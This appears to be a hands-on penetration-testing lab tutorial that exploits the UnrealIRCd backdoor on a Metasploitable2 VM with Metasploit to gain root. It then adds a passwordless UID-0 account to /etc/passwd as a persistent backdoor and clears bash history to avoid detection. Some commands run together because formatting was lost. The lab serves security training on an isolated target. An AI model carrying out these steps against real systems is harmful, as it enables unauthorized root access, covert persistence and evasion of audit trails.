In this lab, we will learn how to create a backdoor and clear traces after successfully gaining access to a target machine through a penetration attack. The scenario is set up in the LabEx environment, where we will use the Kali terminal to exploit vulnerabilities on the Metasploitable2 target machine, gain root access, create a backdoor for future access, and clear any traces left behind during the attack process.
In this step, we will use the Unreal Ircd vulnerability to gain root access on the target machine.
Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.
sudo virsh start Metasploitable2ping 192.168.122.102Press Ctrl+C to stop the ping.
docker run -ti --network host b5b709a49cd5 bashping 192.168.122.102Press Ctrl+C to stop the ping.
Now both the attack machine and the target machine are running, and you can start the penetration testing.
Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.
service postgresql start
msfdb init
cd ~
msfconsoleThis will start the PostgreSQL database service, initialize the database, and launch the Metasploit Framework Console (msfconsole) for further operations.
search unreal_ircdunix/irc/unreal_ircd_3281_backdoor module:use exploit/unix/irc/unreal_ircd_3281_backdoorset RHOST 192.168.122.102exploitwhoamiYou should see that you have gained root access on the target machine.
Press Ctrl+D to quit the Metasploit console then start the inspection
Now that we have gained root access, let's create a backdoor for future access to the target machine.
First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsoleThen, check the system information:
uname -aFind the location of the root user's bash:
cat /etc/passwdCreate a backdoor account with no password:
echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwdVerify the backdoor account creation:
cat /etc/passwdYou should see the new account shiyanlou1234 in the output.
Open a new terminal and connect to the target machine using the backdoor account:
telnet 192.168.122.102Enter the username shiyanlou1234 when prompted.
Check the current user:
whoamiYou should see that you are logged in as the backdoor user.
Press Ctrl+D to quit the Metasploit console then start the inspection
After gaining access and creating a backdoor, it's important to clear any traces left behind during the attack process to avoid detection.
First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsoleOne common way to clear traces is to remove the command history. The history is stored in the .bash_history file. You can clear the history using the following command:
history -cTo clear the .bash_history file, you can find its location using the find command:
find / -name .bash_historyPress Ctrl+D to quit the Metasploit console then start the inspection
In this lab, we learned how to gain root access on a target machine using the Unreal Ircd vulnerability, create a backdoor account for future access, and clear traces left behind during the attack process. This practical experience will help you understand the techniques used by attackers to maintain persistent access and cover their tracks after a successful penetration attack.